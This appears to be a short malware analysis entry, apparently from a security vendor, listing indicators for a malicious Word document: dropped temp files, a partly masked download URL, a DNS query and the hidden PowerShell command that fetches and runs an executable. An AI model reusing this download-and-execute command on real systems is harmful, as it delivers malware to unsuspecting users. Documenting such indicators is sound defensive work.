Technical Information
- http://ka##il.com/test/330.exe as %temp%\330.exe
- <Current directory>\~wrd0000.tmp
- <Current directory>\~wrd0002.tmp
- <Current directory>\~wrl0003.tmp
- <Current directory>\~wrl0003.tmp
- <Current directory>\~wrl0003.tmp
- <PATH_SAMPLE>.doc
- http://ka##il.com/test/330.exe
- DNS ASK ka##il.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://ka##il.com/test/330.exe','%TEMP%\330.exe'); Start-Process('%TEMP%\330.exe')' (with hidden window)